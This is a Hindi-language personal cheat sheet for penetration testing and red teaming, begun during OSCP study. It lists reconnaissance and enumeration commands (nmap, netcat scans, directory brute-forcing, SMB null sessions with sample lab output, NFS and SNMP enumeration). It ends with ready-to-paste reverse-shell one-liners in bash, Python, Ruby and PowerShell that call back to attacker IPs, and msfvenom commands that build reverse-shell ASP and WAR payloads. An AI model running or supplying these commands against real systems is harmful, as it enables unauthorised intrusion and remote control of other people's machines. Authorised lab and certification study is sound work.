
वहाँ बहुत सारी चीट शीट हैं, लेकिन यह मेरी है।
बाहर बहुत सारी चीट शीट हैं, लेकिन यह मेरी है। यह अभी एक कार्य प्रगति पर है, और एक रफ ड्राफ्ट के रूप में रहती है जिसे बहुत, कभी-कभी अपडेट किया जाता है। मैंने इसे OSCP की पढ़ाई करते समय शुरू किया था, लेकिन अब यह और अधिक व्यावहारिक चीज़ों को शामिल करने के लिए विकसित हो रहा है जिनकी मुझे एक रेड टीमर के रूप में आवश्यकता है। नए जोड़ सबसे अधिक संभावना परीक्षा में काम के नहीं होंगे, और इसमें ऐसे टूल भी शामिल हो सकते हैं जिन पर प्रतिबंध है।
बहुत अधूरा...
find / -name flag.txt नाम के आधार पर फ़ाइलें खोजने के लिए।
grep -R "flag40" / -s -n फ़ाइलों में स्ट्रिंग की तलाश करें, रूट डायरेक्टरी से रिकर्सिव रूप से खोजें, कोई त्रुटि आउटपुट नहीं।
dir /s flag.txt वर्तमान डायरेक्टरी और सबडायरेक्टरीज़ में flag.txt नाम की फ़ाइलें खोजने के लिए।
एक उपयोगी टूल -> wadcoms.github.io
nmap -sn 10.11.1.0/24 होस्ट खोजने के लिए नेटवर्क स्वीप।
nmap -sn 10.11.1.0/24 -oG - | awk '/Up$/{print $2}' > list_ips.txt नेटवर्क स्वीप करें और जो IP उप हैं उन्हें खोजें, और IP पतों को एक सूची में सहेजें।nmap -A 10.10.10.10 सामान्य TCP पोर्ट्स की त्वरित स्कैनिंग के लिए, OS और सेवा पहचान के साथ।
nmap -A 10.10.10.10 -p- OS और सेवा पहचान के साथ सभी TCP पोर्ट्स स्कैन करने के लिए।
nmap -A -sU 10.10.10.10 OS और सेवा पहचान के साथ सभी UDP पोर्ट्स स्कैन करने के लिए।
sudo nmap -O -A -sV 10.10.10.10 सभी सामान्य TCP पोर्ट्स स्कैन करने, OS की फिंगरप्रिंट करने, स्क्रिप्ट चलाने और बैनर हड़पने के लिए।
proxychains nmap -Pn -sT 10.10.10.10 -v क्योंकि ICMP/UDP स्कैन काम नहीं करते।
-w फ़्लैग टाइमआउट को सेकंड में निर्दिष्ट करता है और -z फ़्लैग शून्य डेटा भेजता है (स्कैनिंग के लिए)
nc -nvv -w 1 -z 10.11.1.220 3388-3390 पोर्ट 3388-3390 तक TCP स्कैन।
nc -nv -u -z -w 1 10.11.1.115 160-162 पोर्ट 160-162 तक UDP स्कैन।
gobuster dir -u http://10.1.1.27 -w /usr/share/wordlists/dirb/big.txt।मुझे dirsearch भी पसंद है।
Kali पर उपयोगी वर्डलिस्ट
kali@kali:~/Tools/dirsearch$ ls /usr/share/wordlists
dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt rockyou.txt.gz wfuzz
kali@kali:~/Tools/dirsearch$ ls /usr/share/seclists
Discovery Fuzzing IOCs Miscellaneous Passwords Pattern-Matching Payloads README.md Usernames Web-Shells
kali@kali:~/Tools/dirsearch$
python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirb/big.txt -r dirb के big.txt के साथ डायरेक्टरी एन्यूमरेशन, कॉपी/पेस्ट करें और केवल IP/URL और एक्सटेंशन बदलें।
python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r dirbuster की डायरेक्टरी सूची के साथ डायरेक्टरी एन्यूमरेशन, कॉपी/पेस्ट करें और केवल IP/URL और एक्सटेंशन बदलें।
python3 dirsearch.py -u http://10.11.1.71 -t 100 -e cgi -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -r, CGI का ब्रूट फोर्स करें।
एक rsync मॉड्यूल अनिवार्य रूप से एक डायरेक्टरी शेयर है। इन मॉड्यूल को वैकल्पिक रूप से पासवर्ड द्वारा सुरक्षित किया जा सकता है। यह विकल्प उपलब्ध मॉड्यूल की सूची देता है और, वैकल्पिक रूप से, यह निर्धारित करता है कि मॉड्यूल तक पहुँचने के लिए पासवर्ड आवश्यक है या नहीं**:**:
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
smbclient -L 10.11.1.146 उपलब्ध शेयर सूचीबद्ध करने के लिए
smbclient //10.11.1.146/IPC$ उस शेयर में लॉगिन करने के लिए। यदि वह काम नहीं करता है, तो sudo आज़माएँ... sudo smbclient //10.11.1.146/IPC$
enum4linux 10.11.1.146 -a -o smb शेयर को स्वचालित करने के लिए enum4linux का उपयोग करें।
यदि आप Null लॉगऑन के साथ कनेक्ट कर सकते हैं -> rpcclient -U '' -N forest.htb।
rpcclient $> querydomaininfo
command not found: querydomaininfo
rpcclient $> querydominfo
Domain: HTB
Server:
Comment:
Total Users: 105
Total Groups: 0
Total Aliases: 0
Sequence No: 1
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
Unknown 3: 0x1
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $>
showmount -e 10.10.10.10 उपलब्ध माउंट देखने के लिए
mount -t nfs 10.10.10.10:/ /tmp -o nolock रूट या जो भी फ़ोल्डर हो, उसे माउंट करने के लिए।
onesixtyone -c community -i ips SNMP सर्वरों की पहचान करने के लिए लक्ष्य नेटवर्क स्कैन करें, जहां community और ips सूचियाँ हैं community = (public, private, manager)।
snmp-check 10.11.1.227 नीचे दिया गया सब कुछ करता है, लेकिन बेहतर और इसे आपके लिए अच्छे से फॉर्मेट करता है :)
snmpwalk -c public -v1 -t 10 10.11.1.115 पूरे MIB ट्री को एन्यूमरेट करें।
snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25 Windows उपयोगकर्ताओं को एन्यूमरेट करें।
snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2 Windows पर चल रही प्रक्रियाओं को एन्यूमरेट करें।
snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.6.13.1.3 खुले TCP पोर्ट्स को एन्यूमरेट करें।
snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2 इंस्टॉल किए गए सॉफ़्टवेयर को एन्यूमरेट करें।
/bin/bash -i >& /dev/tcp/192.168.119.137/1337 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
ruby -rsocket -e'f=TCPSocket.open("10.10.14.3",8081).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.137',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
nc -lvp 4444 Netcat के साथ पोर्ट 4444 पर रिवर्स शेल सुनें (पकड़ें)
python -c 'import pty; pty.spawn("/bin/bash")' या python3 -c 'import pty; pty.spawn("/bin/bash")'
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f war > shell.war